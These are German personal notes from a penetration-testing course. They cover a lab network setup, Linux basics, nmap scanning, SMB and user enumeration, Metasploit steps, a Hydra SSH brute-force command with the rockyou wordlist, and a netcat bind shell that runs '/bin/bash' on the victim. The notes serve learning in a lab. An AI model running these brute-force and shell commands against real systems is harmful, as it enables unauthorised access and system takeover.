Heise Hacking Kurs
Testumgebung:
Windows-Rechner:
IP-Adresse: 10.1.1.129
MAC-Adresse: BA-F0-EC-81-03-92
Kali-Linux:
IP-Adresse: 10.1.1.128
MAC-Adresse: FE-3A-E0-10-0E-35
Serverschutz Bausteine von BSI
Schichtenmodel TCP/IP
Infos
Generell
127.0.0.1 = localhost : Jedes Paket geht wieder zurück auf den sendenden Rechner
Wireshark
ARP = Address Resolution Protocol dient dazu MAC adressen auszulesen
Befehle:
Befehl | Beispiel | |
sipcalc | sipcalc 192.168.178.0/24 | Stellt die Subnetzmaske mit den IP-Adressen dar |
ls -la | grep | ls -la | grep go | Gibt dann nur Inhalte wieder, die go enthalten |
find | find . | Gibt alles aus |
find . | grep | find . | grep go | Findet alles in Laufwerk und gibt aber nur inhalte mit go zurück |
locate | Suche über die gesamte Festplatte |
Berechtigungen
-rw-r--r-- 1 dapelza dapelza 0 31. Jan 10:19 test.txt
Berechtigung User Gruppe Größe Datum Dateiname
3 Bits Besitzer 3 Bits Gruppe 3 Bits alle anderen
Bit | Berechtigung | |
r | Read | |
w | Write | |
x | Execute (Ausführen) | |
Berechtigung ändern | ||
chmod +x test.txt | Alle dürfen ausführen | |
chmod -x test.txt | Berechtiung nehmen | |
chmod u+x test.txt | Nur der User darf die Datei ausführen | |
chmod g+x test.txt | Gruppe darf ausführen |
Phasen des Hacking
Passives Scannen
hunter.io
Email-Adressen von Unternehmen herausfinden
Burp Suite
Zum Auslesen von Http Code über einen Proxy
DefaultCreds-cheat-sheet
Webseiten überprüfen
Aktives Scannen
Nmap
Parameter | Kommentar |
nmap 10.1.1.136 -v | Vorher schon ergebnisse Anzeigen |
nmap 10.1.1.136 -oN /pfad/zur/datei | speichert die ergebnisse in einer Datei ab |
nmap 10.1.1.136 -p40,21 | können bestimmte Ports gescannt werden |
nmap 10.1.1.136 -sU | Scannta auch udap |
nmap 10.1.1.136 -A | Führt scripte aus |
Dirbuster
Scannt nach unterverzeichnisen auf einer Domain
Im internet nach Exploits suchen
Beispiel: exploitdb Wordpress 4.9
searchsploit
findet schwachstellen in einer Software
smbmap
findet schwachstellen in der SMB freigabe
smbmap -u '' -H 10.0.2.9
-u '' = User aber nicht angeben.
Enum4Linux
findet usernamen
enum4linux 10.1.1.150 -U
Hydra
Brutforce auf ssh oder smb
hydra -l jan -P /usr/share/wordlist/rockyou.txt ssh://10.1.1.12 -t 4
Exploit-Datenbanken
www.exploit-db.com
www.cvedetails.com
Exploits
Metasploit framework
msfconsole
Bevor man mit msf los legt:
Datenbank starten
sudo msfdb init
Postgressql dienst starten
sudo systemctl start postgresql
Metasploit verwenden
search proftp
use exploit/windwos/ftp/proftp_banner
oder
use 4
danach:
options
set Rhosts
show payloads
show targets
Netcat
Opfer
nc -lvp 4444
- Damit kann man generell auf eine Verbindung lauschen
nc -lvp 4444 -e /bin/bash
- Würde bei Verbindung eine Shell starten
Angreifer
nc 10.1.1.138 4444
- Stellt eine Verbindung zum lauschenden Opfer auf dem Port 4444 her
Pentest MOnkey reverse shell